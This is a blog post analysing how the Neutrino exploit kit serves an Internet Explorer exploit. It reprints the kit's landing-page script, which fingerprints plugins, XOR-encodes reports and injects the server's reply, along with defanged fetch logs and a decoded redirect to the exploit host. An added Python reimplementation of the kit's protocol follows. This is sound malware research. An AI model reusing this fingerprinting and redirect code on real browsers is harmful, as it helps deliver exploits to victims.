Tuesday, September 17, 2013

Neutrino EK - IE exploit analysis

More Neutrino stuff on the menu. Hopefully you find it better than spam and are not tired of my Neutrino adventures. Having just come back from a week offline, I spotted a tweet:



Just over a week ago I more or less concluded that Neutrino only had Java exploits. But here someone proved me wrong, and I must admit I had only checked with the "obvious" stuff that Neutrino uses PluginDetect for (or did the kit just evolve right after my write-up?). So time to look once again into Neutrino and one of its mysteries.

Get the landing


My referrer from two weeks ago was dead. The TDS was still up and working though, so I had to find a valid referrer. Urlquery to the rescue: I found a Neutrino reference there which was still alive, so here we go:

--2013-09-17--  hxxp: //ppbenicarlo.com/files
Resolving ppbenicarlo.com... 5.56.22.5
Connecting to ppbenicarlo.com|5.56.22.5|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: hxxp: //ppbenicarlo.com/files/ [following]
--2013-09-17 --  hxxp: //ppbenicarlo.com/files/
Connecting to ppbenicarlo.com|5.56.22.5|:80... connected.
HTTP request sent, awaiting response... 302 Moved Temporarily
Location: hxxp: //yojhoorbghw.is-uberleet.com:8000/horsihcmtbmf?gpnhe=3251988 [following]
--2013-09-17--  hxxp: //yojhoorbghw.is-uberleet.com:8000/horsihcmtbmf?gpnhe=3251988
Resolving yojhoorbghw.is-uberleet.com... 5.254.101.114
Connecting to yojhoorbghw.is-uberleet.com|5.254.101.114|:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `pane3'

     0K .                                                      98.7M=0s

2013-09-17 (98.7 MB/s) - `pane3' saved [1620]

Neutrino landing incoming...

<html>
<head>
 
 
 <script src="jquery.min.js"></script> 
 
 
 <script type="text/javascript" src="index.js"></script>
 
</head>
<body>
 <script type="text/javascript">
  // a = hid (victim id), b = POST path, c = XOR key, d = form field name carrying the key, e = form field name carrying the report
  function req(a, b, c, d, e) {
   var m = PluginDetect.getVersion,
    n = decodeURIComponent,
    p = encodeURIComponent,
    h = xor,
    g = [{
     adobe_reader: "AdobeReader"
    }, {
     java: "Java"
    }, {
     flash: "Flash"
    }, {
     quick_time: "QuickTime"
    }, {
     real_player: "RealPlayer"
    }, {
     shockwave: "Shockwave"
    }, {
     silver_light: "Silverlight"
    }, {
     vlc: "VLC"
    }, {
     wmp: "WMP"
    }],
    f = [];
   f.push("hid:::" + a);
   // one "name:::version" entry per plugin; PluginDetect returns null for plugins that are absent
   for (var k in g)
    for (var l in g[k]) f.push(l + ":::" + m(g[k][l]));
   f.push("office:::" + office_ver());
   a = {};
   a[d] = c;
   // the report is joined with ";;;", XOR-ed with the key and percent-encoded
   a[e] = p(h(f.join(";;;"), c));
   // the reply is percent-decoded, XOR-ed with the same key and injected into the page
   $.post(b, a, function (a, b) {
    $("body").append(h(n(a), c))
   })
  }

  // repeating-key XOR of string a with key b
  function xor(a, b) {
   for (var c = "", d = 0, e = 0; d < a.length; d++) e = Math.floor(d % b.length), c += String.fromCharCode(a.charCodeAt(d) ^ b.charCodeAt(e));
   return c
  }

  // probes the SharePoint.OpenDocuments ActiveX objects to guess the installed Office version
  function office_ver() {
   var a = 0,
    b = 0;
   try {
    a = new ActiveXObject("SharePoint.OpenDocuments.4")
   } catch (c) {}
   try {
    b = new ActiveXObject("SharePoint.OpenDocuments.3")
   } catch (d) {}
   return "object" == typeof a && "object" == typeof b ? "2010" : "number" == typeof a && "object" == typeof b ? "2007" : null
  }


  // hid, POST path, XOR key, field name for the key, field name for the report
  $(document).ready(function () {
   req("52384269aaa2cc6e0a355f6b", "nwsshubk", "mxipcidv", "shjhrkhksgfqhsp", "dqxjtgnonkgfrb")
  });
 </script>
 
 
</body>
</html>

Standard Neutrino stuff, this...

Get the exploit URL


As we want to look into the reported IE exploit from Neutrino, we send in nothing from the plugin-detect phase (every plugin reported as null):


hid:::52384269aaa2cc6e0a355f6b;;;adobe_reader:::null;;;java:::null;;;flash:::null;;;quick_time:::null;;;real_player:::null;;;shockwave:::null;;;silver_light:::null;;;vlc:::null;;;wmp:::null;;;office:::null

Post that to the server and see what we get (for details on Neutrino HTTP posts, check my earlier analysis):

q%60y_%0F%0B%04X%08%13%17%0B%18P_%01%04%17%19%5EYB%01%06%1A%0B%06%0B%04%0F%1F%01%07M%17%5B%18%1A%0C%02%0F%0C%01%02C%1B%06%1
DYQTF%5DW%0C%1C%06%1D%0D%0F%09%1A%07%15%02%0ACV%04%1CTW%04%06CHQ%11%07%16%1DD%18%0C%15%0CMD%10%17%11%03%11%1FWC%1F%05%1A%18%1DTW%1
9%0B%14%17%1E%19%04W%5DUK%10%02%0A%04Nj%60m%7Cdq%60L%10%0A%16%1F%1D%0CWzj%60m%7F%09%17%0A%05%0E%0C%0A%02C%1E%06%02%0E%1A%3FQ%0A%17N-M
%1A%11%14%11%1DXJRn%7FdqU_%10%0A%16%1F%1D%0CWzj%60

As always obfuscated; let's decode:


<form action='hxxp: //yojhoorbghw.is-uberleet.com:8000/eletiydbneac' id='go'><input name='ysgniv' value='zbpasam'></form>   
   <script>
    document.forms['go'].submit();
   </script>
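To make the plugin-detect POST and the XOR-ed reply reproducible offline, here is an added Python re-implementation of the landing page's client-side scheme (my code, not the kit's). The key "mxipcidv", the field names and the hid are the values passed to req() above; the server reply it decodes is constructed, not captured.

```python
import urllib.parse

# Plugin names in the order req() iterates its g array.
PLUGIN_FIELDS = ["adobe_reader", "java", "flash", "quick_time", "real_player",
                 "shockwave", "silver_light", "vlc", "wmp"]


def xor_str(data: str, key: str) -> str:
    """Mirror of xor(a, b): XOR each char with key[i % len(key)]."""
    return "".join(chr(ord(ch) ^ ord(key[i % len(key)]))
                   for i, ch in enumerate(data))


def encode_uri_component(s: str) -> str:
    """encodeURIComponent leaves A-Z a-z 0-9 - _ . ! ~ * ' ( ) unescaped."""
    return urllib.parse.quote(s, safe="-_.!~*'()")


def build_report(hid: str, versions: dict, office=None) -> str:
    """Rebuild the 'name:::value' list that req() joins with ';;;'.
    An absent plugin becomes the string 'null', as JS concatenation of null gives."""
    parts = ["hid:::" + hid]
    for name in PLUGIN_FIELDS:
        ver = versions.get(name)
        parts.append(name + ":::" + ("null" if ver is None else str(ver)))
    parts.append("office:::" + ("null" if office is None else office))
    return ";;;".join(parts)


def build_post(report: str, key: str, key_field: str, data_field: str) -> dict:
    """The two form fields $.post() sends: the XOR key in clear, and the
    XOR-ed, percent-encoded report."""
    return {key_field: key, data_field: encode_uri_component(xor_str(report, key))}


def decode_response(body: str, key: str) -> str:
    """What the success callback does: decodeURIComponent, then XOR with the key."""
    return xor_str(urllib.parse.unquote(body), key)


if __name__ == "__main__":
    key = "mxipcidv"
    report = build_report("52384269aaa2cc6e0a355f6b", {}, None)
    post = build_post(report, key, "shjhrkhksgfqhsp", "dqxjtgnonkgfrb")
    # Constructed stand-in for the server reply: a redirect form like the decoded one above.
    reply = encode_uri_component(xor_str("<form action='http://example.invalid/x' id='go'></form>", key))
    print(post)
    print(decode_response(reply, key))
```

Feeding a captured reply body and the session's key from the landing page to decode_response() gives the cleartext the kit injects into the DOM.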

Sweet stuff, another POST is performed automagically. Let's follow and see what happens.



--2013-09-17 --  hxxp: //yojhoorbghw.is-uberleet.com:8000/eletiydbneac
Resolving yojhoorbghw.is-uberleet.com... 5.254.101.114
Connecting to yojhoorbghw.is-uberleet.com|5.254.101.114|:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `ies3'

     0K .......... ...                                          193K=0.07s

2013-09-17 (193 KB/s) - `ies3' saved [13883]

What did we get?



Lots of JavaScript. Not just any JavaScript: exploit code that looks to me to be exploiting CVE-2013-2551. Thanks to @Rapid7 for the reference within Metasploit. (Picture showing function lea(), AKA exploit().)

Epilogue


So the Neutrino EK has shown that it is more potent than I had concluded. Let's keep our eyes open and see if more exploits get incorporated in the near future.

Happy Neutrino EK IE exploits harvesting :)
